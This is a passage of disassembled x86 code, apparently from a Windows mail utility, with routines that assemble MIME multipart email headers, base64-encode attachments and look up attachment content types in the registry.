lea eax, [esp+58h+arg_64]
push 80h
push eax
call dword_4241DC
mov edx, [esp+60h+arg_21A8]
lea eax, [esp+60h+arg_64]
mov ecx, eax
add esp, 1Ch
sub edx, ecx
loc_414FE7: ; CODE XREF: sub_414690+95F�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_414FE7
mov eax, dword_42B0FC
test eax, eax
jz loc_4151CB
push offset aMimeVersion1_0 ; "MIME-Version: 1.0\r\n"
call ebp ; lstrlen
mov ebx, eax
lea edx, [ebx+1]
push edx
lea ecx, [esp+4Ch+var_34]
call sub_412000
mov eax, [esp+48h+var_34]
mov edx, [esp+48h+var_30]
lea edi, [edx+eax]
mov ecx, ebx
mov edx, ecx
shr ecx, 2
mov esi, offset aMimeVersion1_0 ; "MIME-Version: 1.0\r\n"
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
push offset aContentType ; "Content-Type:"
mov byte ptr [ebx+eax], 0
mov [esp+4Ch+var_30], ebx
call ebp ; lstrlen
mov esi, eax
add ebx, esi
lea eax, [ebx+1]
push eax
lea ecx, [esp+50h+var_38]
call sub_412000
mov eax, [esp+4Ch+var_38]
mov edx, [esp+4Ch+var_34]
mov ecx, esi
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
mov esi, offset aContentType ; "Content-Type:"
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
push offset aMultipartMixed ; " multipart/mixed;\r\n"
mov byte ptr [ebx+eax], 0
mov [esp+50h+var_34], ebx
call ebp ; lstrlen
mov esi, eax
add ebx, esi
lea eax, [ebx+1]
push eax
lea ecx, [esp+54h+var_3C]
call sub_412000
mov eax, [esp+50h+var_3C]
mov edx, [esp+50h+var_38]
mov ecx, esi
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
mov esi, offset aMultipartMixed ; " multipart/mixed;\r\n"
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
push offset aBoundary ; " boundary=\""
mov byte ptr [ebx+eax], 0
mov [esp+54h+var_38], ebx
call ebp ; lstrlen
mov esi, eax
add ebx, esi
lea eax, [ebx+1]
push eax
lea ecx, [esp+58h+var_40]
call sub_412000
mov edx, [esp+54h+var_3C]
mov eax, [esp+54h+var_40]
mov ecx, esi
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
mov esi, offset aBoundary ; " boundary=\""
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov byte ptr [ebx+eax], 0
lea eax, [esp+54h+arg_54]
push eax
mov [esp+58h+var_3C], ebx
call ebp ; lstrlen
mov esi, eax
add ebx, esi
lea ecx, [ebx+1]
push ecx
lea ecx, [esp+5Ch+var_44]
call sub_412000
mov eax, [esp+58h+var_44]
mov edx, [esp+58h+var_40]
mov ecx, esi
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
lea esi, [esp+58h+arg_50]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
push offset asc_4249AC ; "\""
mov byte ptr [ebx+eax], 0
mov [esp+5Ch+var_40], ebx
call ebp ; lstrlen
mov esi, eax
add ebx, esi
lea eax, [ebx+1]
push eax
lea ecx, [esp+60h+var_48]
call sub_412000
mov eax, [esp+5Ch+var_48]
mov edx, [esp+5Ch+var_44]
mov ecx, esi
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
mov esi, offset asc_4249AC ; "\""
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
push offset aThisIsAMultiPa ; "\r\nThis is a multi-part message in MIME "...
mov byte ptr [ebx+eax], 0
mov [esp+60h+var_44], ebx
call ebp ; lstrlen
mov esi, eax
add ebx, esi
lea eax, [ebx+1]
push eax
lea ecx, [esp+64h+var_4C]
call sub_412000
mov edx, [esp+60h+var_48]
mov eax, [esp+60h+var_4C]
mov ecx, esi
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
mov esi, offset aThisIsAMultiPa ; "\r\nThis is a multi-part message in MIME "...
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov byte ptr [ebx+eax], 0
mov esi, ebx
mov ebx, [esp+60h+arg_2188]
jmp loc_415276
; ---------------------------------------------------------------------------
loc_4151CB: ; CODE XREF: sub_414690+968�j
push offset aContentTrans_0 ; "Content-Transfer-Encoding: 7BIT\r\n"
call ebp ; lstrlen
mov esi, eax
lea eax, [esi+1]
push eax
lea ecx, [esp+4Ch+var_34]
mov [esp+4Ch+var_38], esi
call sub_412000
mov eax, [esp+48h+var_34]
mov edx, [esp+48h+var_30]
mov ecx, esi
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
mov esi, offset aContentTrans_0 ; "Content-Transfer-Encoding: 7BIT\r\n"
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
push offset byte_42B100
mov edi, edx
push offset dword_4304DC
mov byte ptr [edi+eax], 0
lea eax, [esp+50h+arg_18C]
push offset aContentTypeTex ; "Content-Type: text/%s; charset=%s\r\n"
push eax
mov [esp+58h+var_30], edi
call sub_419B8A
add esp, 10h
lea ecx, [esp+48h+arg_18C]
push ecx
call ebp ; lstrlen
mov esi, eax
lea eax, [esi+edi]
mov [esp+4Ch+var_3C], eax
inc eax
push eax
lea ecx, [esp+50h+var_38]
call sub_412000
mov edx, [esp+4Ch+var_34]
mov eax, [esp+4Ch+var_38]
mov ecx, esi
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
lea esi, [esp+4Ch+arg_188]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov esi, [esp+4Ch+var_3C]
mov byte ptr [esi+eax], 0
loc_415276: ; CODE XREF: sub_414690+B36�j
mov edi, [ebx+4]
mov eax, [edi+4]
add eax, esi
mov [esp+4Ch+var_2C], eax
inc eax
push eax
mov ecx, edi
mov [esp+50h+var_34], esi
mov [esp+50h+var_3C], edi
call sub_412000
mov eax, [esp+4Ch+var_3C]
mov edx, [eax+4]
mov edi, [edi]
mov ecx, esi
mov esi, [esp+4Ch+var_38]
add edi, edx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [esp+4Ch+var_2C]
mov edx, [eax]
mov byte ptr [ecx+edx], 0
mov [eax+4], ecx
mov eax, [ebx+18h]
mov ecx, [eax+4]
test ecx, ecx
jz short loc_4152D4
mov eax, [eax]
mov ecx, [ebx+4]
push eax
call sub_4120B0
loc_4152D4: ; CODE XREF: sub_414690+C37�j
mov al, byte_42BD78
test al, al
jz short loc_4152EA
mov ecx, [ebx+4]
push offset word_42465C
call sub_4120B0
loc_4152EA: ; CODE XREF: sub_414690+C4B�j
mov eax, [ebx]
mov ecx, [eax+8]
test ecx, ecx
mov dword ptr [eax+4], 0
jz short loc_4152FF
mov eax, [eax]
mov byte ptr [eax], 0
loc_4152FF: ; CODE XREF: sub_414690+C68�j
mov ecx, [ebx+4]
mov esi, [ecx]
mov edi, [ebx]
push esi
mov [esp+50h+var_2C], edi
call ebp ; lstrlen
mov ebp, [edi+4]
add ebp, eax
lea edx, [ebp+1]
push edx
mov ecx, edi
mov [esp+54h+var_40], eax
call sub_412000
mov edi, [edi+4]
mov eax, [esp+50h+var_30]
mov edx, [eax]
mov ecx, [esp+50h+var_40]
add edi, edx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [eax]
mov byte ptr [ecx+ebp], 0
mov [eax+4], ebp
mov edx, [ebx]
mov eax, [edx]
push offset a_nextpart ; "----=_NextPart"
push eax
call sub_4199F0
add esp, 8
test eax, eax
pop edi
pop esi
pop ebp
pop ebx
jz short loc_415368
mov byte_430AC1, 1
loc_415368: ; CODE XREF: sub_414690+CCF�j
mov eax, [esp+40h+var_3C]
test eax, eax
mov byte ptr [esp+40h+arg_2190], 6
jz short loc_415381
push eax
call sub_41930D
add esp, 4
loc_415381: ; CODE XREF: sub_414690+CE6�j
mov eax, [esp+40h+arg_10]
test eax, eax
mov byte ptr [esp+40h+arg_2190], 5
jz short loc_41539A
push eax
call sub_41930D
add esp, 4
loc_41539A: ; CODE XREF: sub_414690+CFF�j
mov eax, [esp+40h+arg_28]
test eax, eax
mov byte ptr [esp+40h+arg_2190], 4
jz short loc_4153B3
push eax
call sub_41930D
add esp, 4
loc_4153B3: ; CODE XREF: sub_414690+D18�j
mov eax, [esp+40h+arg_40]
test eax, eax
mov byte ptr [esp+40h+arg_2190], 3
jz short loc_4153CF
push eax
call sub_41930D
add esp, 4
loc_4153CF: ; CODE XREF: sub_414690+D34�j
mov eax, [esp+40h+arg_34]
test eax, eax
mov byte ptr [esp+40h+arg_2190], 2
jz short loc_4153E8
push eax
call sub_41930D
add esp, 4
loc_4153E8: ; CODE XREF: sub_414690+D4D�j
mov eax, [esp+40h+arg_4C]
test eax, eax
mov byte ptr [esp+40h+arg_2190], 1
jz short loc_415404
push eax
call sub_41930D
add esp, 4
loc_415404: ; CODE XREF: sub_414690+D69�j
mov eax, [esp+40h+arg_1C]
test eax, eax
mov byte ptr [esp+40h+arg_2190], 0
jz short loc_41541D
push eax
call sub_41930D
add esp, 4
loc_41541D: ; CODE XREF: sub_414690+D82�j
mov eax, [esp+40h+var_20]
test eax, eax
mov [esp+40h+arg_2190], 0FFFFFFFFh
jz short loc_415439
push eax
call sub_41930D
add esp, 4
loc_415439: ; CODE XREF: sub_414690+D9E�j
mov ecx, [esp+40h+arg_2188]
mov large fs:0, ecx
mov ecx, [esp+40h+arg_2184]
call sub_4192B6
add esp, 21D8h
retn
sub_414690 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415460 proc near ; CODE XREF: sub_413410+18F�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_18 = dword ptr 1Ch
arg_1C = dword ptr 20h
push 0FFFFFFFFh
push offset SEH_415460
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
xor ebx, ebx
mov [esp+28h+var_24], ebx
mov [esp+28h+var_20], ebx
mov [esp+28h+var_1C], ebx
mov [esp+28h+var_4], ebx
mov [esp+28h+var_18], ebx
mov [esp+28h+var_14], ebx
mov [esp+28h+var_10], ebx
push 2000h
lea ecx, [esp+2Ch+var_24]
mov byte ptr [esp+2Ch+var_4], 1
call sub_412000
cmp [esp+28h+arg_14], ebx
jnz loc_415647
cmp [esp+28h+arg_1C], ebx
jnz loc_415647
cmp [esp+28h+arg_18], ebx
push ebp
mov ebp, [esp+2Ch+arg_0]
push esi
push edi
jz short loc_41551F
mov eax, [ebp+4]
mov edx, [ebp+0]
lea esi, [eax+edx-3]
mov ecx, 3
mov edi, offset asc_424CAC ; "\n\r\n"
xor eax, eax
repe cmpsb
jz short loc_4154F1
push offset word_42465C
mov ecx, ebp
call sub_4120B0
loc_4154F1: ; CODE XREF: sub_415460+83�j
mov esi, [esp+34h+arg_8]
mov eax, [esi]
push eax
mov ecx, ebp
call sub_4120B0
cmp [esi+4], ebx
jz short loc_41551F
mov eax, [ebp+0]
push offset aThisIsAMulti_0 ; "This is a multi-part message in MIME fo"...
push eax
call sub_4199F0
add esp, 8
test eax, eax
jnz short loc_41551F
mov byte_430AC1, bl
loc_41551F: ; CODE XREF: sub_415460+69�j
; sub_415460+A2�j ...
cmp byte_42BD78, bl
jz short loc_41554D
mov edx, [ebp+4]
mov eax, [ebp+0]
lea esi, [edx+eax-3]
mov ecx, 3
mov edi, offset asc_424CAC ; "\n\r\n"
xor edx, edx
repe cmpsb
jz short loc_41554D
push offset word_42465C
mov ecx, ebp
call sub_4120B0
loc_41554D: ; CODE XREF: sub_415460+C5�j
; sub_415460+DF�j
mov esi, [esp+34h+arg_4]
cmp esi, ebx
jz loc_41561F
cmp byte_430AC1, bl
jz short loc_4155D0
cmp dword_42B0FC, ebx
jz short loc_4155D0
push offset dword_424600
mov ecx, ebp
call sub_4120B0
mov eax, [esp+34h+arg_10]
push eax
mov ecx, ebp
call sub_4120B0
push offset word_42465C
mov ecx, ebp
call sub_4120B0
push offset aContentDescrip ; "Content-description: Mail message body\r"...
mov ecx, ebp
call sub_4120B0
push offset aContentTrans_0 ; "Content-Transfer-Encoding: 7BIT\r\n"
mov ecx, ebp
call sub_4120B0
mov edi, [esp+34h+var_24]
push offset byte_42B100
push offset dword_4304DC
push offset aContentTypeT_0 ; "Content-Type: text/%s; charset=%s\r\n\r\n"
push edi
call sub_419B8A
add esp, 10h
push edi
mov ecx, ebp
call sub_4120B0
mov byte_430AC0, 1
loc_4155D0: ; CODE XREF: sub_415460+FF�j
; sub_415460+107�j
mov ecx, dword_430530
push esi
push ecx
lea ecx, [esp+3Ch+var_18]
mov [esp+3Ch+var_14], ebx
call sub_412060
lea edx, [esp+34h+var_18]
push edx
mov ecx, ebp
call sub_412810
cmp byte_42BD78, bl
jz short loc_41561F
mov eax, [ebp+4]
mov edx, [ebp+0]
lea esi, [eax+edx-3]
mov ecx, 3
mov edi, offset asc_424CAC ; "\n\r\n"
xor eax, eax
repe cmpsb
jz short loc_41561F
push offset word_42465C
mov ecx, ebp
call sub_4120B0
loc_41561F: ; CODE XREF: sub_415460+F3�j
; sub_415460+197�j ...
cmp [esp+34h+arg_C], ebx
pop edi
pop esi
pop ebp
jz short loc_415647
cmp dword_4304F8, ebx
jz short loc_415639
mov ecx, dword_4304F4
push ecx
jmp short loc_41563E
; ---------------------------------------------------------------------------
loc_415639: ; CODE XREF: sub_415460+1CE�j
push offset aUnspecified ; "<unspecified>"
loc_41563E: ; CODE XREF: sub_415460+1D7�j
lea ecx, [esp+2Ch+var_24]
call sub_4120B0
loc_415647: ; CODE XREF: sub_415460+4E�j
; sub_415460+58�j ...
mov eax, [esp+28h+var_18]
cmp eax, ebx
mov byte ptr [esp+28h+var_4], bl
jz short loc_41565C
push eax
call sub_41930D
add esp, 4
loc_41565C: ; CODE XREF: sub_415460+1F1�j
mov eax, [esp+28h+var_24]
cmp eax, ebx
mov [esp+28h+var_4], 0FFFFFFFFh
pop ebx
jz short loc_415676
push eax
call sub_41930D
add esp, 4
loc_415676: ; CODE XREF: sub_415460+20B�j
mov ecx, [esp+24h+var_C]
xor eax, eax
mov large fs:0, ecx
add esp, 24h
retn
sub_415460 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415690 proc near ; CODE XREF: sub_413410+1E2�p
arg_0 = dword ptr 4
arg_8 = dword ptr 0Ch
mov al, byte_430AC0
test al, al
jz short locret_4156DB
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+4]
mov ecx, [esi]
cmp byte ptr [eax+ecx-3], 0Ah
jz short loc_4156B6
push offset word_42465C
mov ecx, esi
call sub_4120B0
loc_4156B6: ; CODE XREF: sub_415690+18�j
push offset dword_424600
mov ecx, esi
call sub_4120B0
mov edx, [esp+4+arg_8]
push edx
mov ecx, esi
call sub_4120B0
push offset asc_424CB0 ; "--\r\n"
mov ecx, esi
call sub_4120B0
pop esi
locret_4156DB: ; CODE XREF: sub_415690+7�j
retn
sub_415690 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4156E0 proc near ; CODE XREF: sub_412860+3C3�p
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 60h
mov eax, dword_42A290
push ebx
mov [esp+64h+var_4], eax
mov eax, [esp+64h+arg_0]
push ebp
push esi
mov esi, [eax]
push edi
mov edi, [eax+4]
mov ebp, [esp+70h+arg_4]
lea ecx, ds:5[edi*8]
mov eax, 0AAAAAAABh
mul ecx
mov ecx, edx
shr ecx, 2
lea edx, [ecx+47h]
mov eax, 38E38E39h
mul edx
mov eax, [ebp+4]
shr edx, 4
lea edx, [eax+edx*2]
lea eax, [edx+ecx+1]
push eax
mov ecx, ebp
mov [esp+74h+var_5C], esi
mov [esp+74h+arg_0], edi
call sub_412000
xor ebx, ebx
cmp edi, 2
mov byte ptr [edi+esi], 0
mov [esp+70h+var_C], 0
jbe loc_4158C8
add edi, 0FFFFFFFDh
mov eax, 0AAAAAAABh
mul edi
mov edi, off_42A004
shr edx, 1
inc edx
mov [esp+70h+arg_4], edx
loc_415762: ; CODE XREF: sub_4156E0+1E0�j
cmp ebx, 48h
jnz loc_41585A
lea ecx, [esp+70h+var_54]
push ecx
call dword_424094 ; lstrlen
mov ebx, [ebp+4]
mov ecx, [ebp+8]
mov edi, eax
add ebx, edi
lea eax, [ebx+1]
cmp eax, ecx
mov [esp+70h+var_60], edi
jbe short loc_4157D7
add eax, 1FFFh
and eax, 0FFFFE000h
push eax
mov [ebp+8], eax
call sub_4191C1
mov esi, [ebp+0]
add esp, 4
test esi, esi
mov [esp+70h+var_58], eax
jz short loc_4157D4
mov ecx, [ebp+4]
inc ecx
mov edx, ecx
shr ecx, 2
mov edi, eax
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+0]
push eax
call sub_41930D
mov eax, [esp+74h+var_58]
mov edi, [esp+74h+var_60]
add esp, 4
loc_4157D4: ; CODE XREF: sub_4156E0+CA�j
mov [ebp+0], eax
loc_4157D7: ; CODE XREF: sub_4156E0+A9�j
mov edx, [ebp+0]
mov ecx, edi
mov edi, [ebp+4]
add edi, edx
mov edx, ecx
shr ecx, 2
lea esi, [esp+70h+var_54]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+0]
mov byte ptr [ebx+eax], 0
mov eax, [esp+70h+arg_8]
mov [ebp+4], ebx
xor ebx, ebx
test eax, eax
jz short loc_415850
push offset word_42465C
call dword_424094 ; lstrlen
mov esi, eax
mov eax, [ebp+4]
add eax, esi
mov [esp+70h+var_60], eax
inc eax
push eax
mov ecx, ebp
call sub_412000
mov edi, [ebp+4]
mov edx, [ebp+0]
mov eax, [esp+70h+var_60]
mov ecx, esi
add edi, edx
mov edx, ecx
shr ecx, 2
mov esi, offset word_42465C
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+0]
mov [eax+ecx], bl
mov [ebp+4], eax
loc_415850: ; CODE XREF: sub_4156E0+125�j
mov edi, off_42A004
mov esi, [esp+70h+var_5C]
loc_41585A: ; CODE XREF: sub_4156E0+85�j
movzx edx, byte ptr [esi+2]
xor eax, eax
mov ah, [esi]
add esi, 3
mov [esp+70h+var_5C], esi
mov al, [esi-2]
shl eax, 8
or eax, edx
mov ecx, eax
shr ecx, 12h
and ecx, 3Fh
mov dl, [ecx+edi]
mov [esp+ebx+70h+var_54], dl
mov ecx, eax
shr ecx, 0Ch
and ecx, 3Fh
mov dl, [ecx+edi]
mov ecx, eax
mov [esp+ebx+70h+var_53], dl
inc ebx
shr ecx, 6
and ecx, 3Fh
mov dl, [ecx+edi]
inc ebx
mov [esp+ebx+70h+var_54], dl
mov edx, [esp+70h+arg_0]
and eax, 3Fh
mov al, [eax+edi]
inc ebx
mov [esp+ebx+70h+var_54], al
mov eax, [esp+70h+arg_4]
sub edx, 3
inc ebx
dec eax
mov [esp+70h+arg_0], edx
mov [esp+70h+arg_4], eax
jnz loc_415762
jmp short loc_4158CE
; ---------------------------------------------------------------------------
loc_4158C8: ; CODE XREF: sub_4156E0+65�j
mov edi, off_42A004
loc_4158CE: ; CODE XREF: sub_4156E0+1E6�j
mov eax, [esp+70h+arg_0]
test eax, eax
jz loc_4159D5
cmp ebx, 48h
jnz loc_41597E
lea ecx, [esp+70h+var_54]
push ecx
call dword_424094 ; lstrlen
mov ebx, [ebp+4]
mov esi, eax
add ebx, esi
lea edx, [ebx+1]
push edx
mov ecx, ebp
call sub_412000
mov edi, [ebp+4]
mov eax, [ebp+0]
mov ecx, esi
add edi, eax
mov eax, ecx
shr ecx, 2
lea esi, [esp+70h+var_54]
rep movsd
mov ecx, eax
mov eax, [esp+70h+arg_8]
and ecx, 3
test eax, eax
rep movsb
mov ecx, [ebp+0]
mov byte ptr [ebx+ecx], 0
mov [ebp+4], ebx
jz short loc_415972
push offset word_42465C
call dword_424094 ; lstrlen
mov ebx, [ebp+4]
mov esi, eax
add ebx, esi
lea edx, [ebx+1]
push edx
mov ecx, ebp
call sub_412000
mov edi, [ebp+4]
mov eax, [ebp+0]
mov ecx, esi
add edi, eax
mov eax, ecx
shr ecx, 2
mov esi, offset word_42465C
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+0]
mov byte ptr [ebx+ecx], 0
mov [ebp+4], ebx
loc_415972: ; CODE XREF: sub_4156E0+24C�j
mov edi, off_42A004
mov esi, [esp+70h+var_5C]
xor ebx, ebx
loc_41597E: ; CODE XREF: sub_4156E0+1FD�j
xor eax, eax
mov ah, [esi]
mov al, [esi+1]
mov edx, eax
shr edx, 0Ah
and edx, 3Fh
mov cl, [edx+edi]
mov [esp+ebx+70h+var_54], cl
mov edx, eax
shr edx, 4
and edx, 3Fh
mov cl, [edx+edi]
inc ebx
mov [esp+ebx+70h+var_54], cl
mov ecx, [esp+70h+arg_0]
inc ebx
cmp ecx, 2
mov ecx, [esp+70h+arg_C]
mov dl, 3Dh
jnz short loc_4159C3
and eax, 0Fh
mov al, [edi+eax*4]
mov [esp+ebx+70h+var_54], al
jmp short loc_4159CB
; ---------------------------------------------------------------------------
loc_4159C3: ; CODE XREF: sub_4156E0+2D5�j
test ecx, ecx
jz short loc_4159D5
mov [esp+ebx+70h+var_54], dl
loc_4159CB: ; CODE XREF: sub_4156E0+2E1�j
inc ebx
test ecx, ecx
jz short loc_4159D5
mov [esp+ebx+70h+var_54], dl
inc ebx
loc_4159D5: ; CODE XREF: sub_4156E0+1F4�j
; sub_4156E0+2E5�j ...
test ebx, ebx
jz loc_415AC0
lea ecx, [esp+70h+var_54]
push ecx
mov [esp+ebx+74h+var_54], 0
call dword_424094 ; lstrlen
mov ebx, [ebp+4]
mov ecx, [ebp+8]
mov edi, eax
add ebx, edi
lea eax, [ebx+1]
cmp eax, ecx
mov [esp+70h+arg_0], edi
jbe short loc_415A4E
add eax, 1FFFh
and eax, 0FFFFE000h
push eax
mov [ebp+8], eax
call sub_4191C1
mov esi, [ebp+0]
add esp, 4
test esi, esi
mov [esp+70h+var_60], eax
jz short loc_415A4B
mov ecx, [ebp+4]
inc ecx
mov edx, ecx
shr ecx, 2
mov edi, eax
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+0]
push eax
call sub_41930D
mov edi, [esp+74h+arg_0]
mov eax, [esp+74h+var_60]
add esp, 4
loc_415A4B: ; CODE XREF: sub_4156E0+341�j
mov [ebp+0], eax
loc_415A4E: ; CODE XREF: sub_4156E0+320�j
mov edx, [ebp+0]
mov ecx, edi
mov edi, [ebp+4]
add edi, edx
mov edx, ecx
shr ecx, 2
lea esi, [esp+70h+var_54]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+0]
mov byte ptr [ebx+eax], 0
mov eax, [esp+70h+arg_8]
test eax, eax
mov [ebp+4], ebx
jz short loc_415AC0
push offset word_42465C
call dword_424094 ; lstrlen
mov ebx, [ebp+4]
mov esi, eax
add ebx, esi
lea ecx, [ebx+1]
push ecx
mov ecx, ebp
call sub_412000
mov edi, [ebp+4]
mov edx, [ebp+0]
mov ecx, esi
add edi, edx
mov edx, ecx
shr ecx, 2
mov esi, offset word_42465C
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+0]
mov byte ptr [ebx+eax], 0
mov [ebp+4], ebx
loc_415AC0: ; CODE XREF: sub_4156E0+2F7�j
; sub_4156E0+39A�j
mov ecx, [esp+70h+var_4]
pop edi
pop esi
pop ebp
pop ebx
call sub_4192B6
add esp, 60h
retn
sub_4156E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415AE0 proc near ; CODE XREF: sub_412860+172�p
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_194 = byte ptr -194h
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_17C = dword ptr -17Ch
var_178 = dword ptr -178h
var_174 = dword ptr -174h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_14C = byte ptr -14Ch
var_144 = byte ptr -144h
var_114 = byte ptr -114h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_C = dword ptr 10h
push 0FFFFFFFFh
push offset SEH_415AE0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 170h
mov eax, dword_42A290
push ebx
push esi
push edi
xor edi, edi
mov [esp+188h+var_10], eax
mov [esp+188h+var_17C], edi
mov [esp+188h+var_178], 1
mov [esp+188h+var_174], edi
mov [esp+188h+var_170], edi
mov [esp+188h+var_16C], edi
mov eax, [esp+188h+arg_C]
push 2Eh
push eax
mov [esp+190h+var_4], edi
call sub_41A6D0
add esp, 8
cmp eax, edi
jz short loc_415BB0
lea edx, [esp+188h+var_114]
sub edx, eax
loc_415B47: ; CODE XREF: sub_415AE0+6F�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_415B47
lea ecx, [esp+188h+var_17C]
push ecx
push 20019h
push edi
lea edx, [esp+194h+var_114]
push edx
push 80000000h
call dword_424010 ; RegOpenKeyExA
cmp eax, edi
jnz short loc_415BB0
lea eax, [esp+19Ch+var_17C]
push eax
mov eax, [esp+1A0h+var_190]
lea ecx, [esp+1A0h+var_178]
push ecx
lea edx, [esp+1A4h+var_18C]
push edx
push edi
push offset aContentType_0 ; "Content Type"
push eax
mov [esp+1B4h+var_17C], 50h
call dword_424014 ; RegQueryValueExA
mov ecx, [esp+1B4h+var_1A8]
push ecx
mov ebx, eax
call dword_424008 ; RegCloseKey
cmp ebx, edi
lea esi, [esp+1B8h+var_194]
jz short loc_415C0F
loc_415BB0: ; CODE XREF: sub_415AE0+5F�j
; sub_415AE0+91�j
mov edx, off_42A008
mov ebx, dword_42413C
push ebp
push edx
lea eax, [esp+1C0h+var_144]
push eax
xor ebp, ebp
call ebx ; lstrcmpi
test eax, eax
jz short loc_415BEE
mov edi, offset off_42A008
mov esi, edi
loc_415BD2: ; CODE XREF: sub_415AE0+10A�j
cmp dword ptr [edi], 0
jz short loc_415BF7
mov ecx, [esi+8]
add esi, 8
push ecx
lea edx, [esp+1C8h+var_14C]
push edx
inc ebp
mov edi, esi
call ebx ; lstrcmpi
test eax, eax
jnz short loc_415BD2
xor edi, edi
loc_415BEE: ; CODE XREF: sub_415AE0+E9�j
mov esi, off_42A00C[ebp*8]
jmp short loc_415C0E
; ---------------------------------------------------------------------------
loc_415BF7: ; CODE XREF: sub_415AE0+F5�j
mov esi, [esp+1C4h+var_2C]
test esi, esi
jz short loc_415C07
cmp byte ptr [esi], 0
jnz short loc_415C0C
loc_415C07: ; CODE XREF: sub_415AE0+120�j
mov esi, offset aApplicationOct ; "application/octet-stream"
loc_415C0C: ; CODE XREF: sub_415AE0+125�j
xor edi, edi
loc_415C0E: ; CODE XREF: sub_415AE0+115�j
pop ebp
loc_415C0F: ; CODE XREF: sub_415AE0+CE�j
mov ecx, [esp+1C0h+var_28]
push 7
lea eax, [esp+1C4h+var_1AC]
push eax
push ecx
call sub_414370
mov edx, [esp+1CCh+var_1AC]
mov eax, [esp+1CCh+var_34]
push edx
push esi
push offset aContentTypeSNa ; "Content-Type: %s;\r\n name=\"%s\"\r\n"
push eax
call sub_419B8A
mov edx, [esp+1DCh+var_30]
add esp, 1Ch
cmp edx, edi
jz short loc_415C5A
mov eax, esi
sub edx, esi
lea ecx, [ecx+0]
loc_415C50: ; CODE XREF: sub_415AE0+178�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_415C50
loc_415C5A: ; CODE XREF: sub_415AE0+167�j
mov eax, [esp+1C0h+var_1AC]
cmp eax, edi
pop edi
pop esi
mov [esp+1B8h+var_3C], 0FFFFFFFFh
pop ebx
jz short loc_415C79
push eax
call sub_41930D
add esp, 4
loc_415C79: ; CODE XREF: sub_415AE0+18E�j
mov ecx, [esp+1B4h+var_44]
mov large fs:0, ecx
mov ecx, [esp+1B4h+var_48]
call sub_4192B6
add esp, 17Ch
retn
sub_415AE0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415CA0 proc near ; CODE XREF: sub_415CE0+41�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov al, [esi]
test al, al
jz short loc_415CC8
jmp short loc_415CB0
; ---------------------------------------------------------------------------
align 10h
loc_415CB0: ; CODE XREF: sub_415CA0+B�j
; sub_415CA0+26�j
movsx eax, al
push eax
call sub_41A7E8
add esp, 4
test eax, eax
jz short loc_415CCF
mov al, [esi+1]
inc esi
test al, al
jnz short loc_415CB0
loc_415CC8: ; CODE XREF: sub_415CA0+9�j
mov eax, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_415CCF: ; CODE XREF: sub_415CA0+1E�j
xor eax, eax
pop esi
retn
sub_415CA0 endp
; ---------------------------------------------------------------------------
align 10h
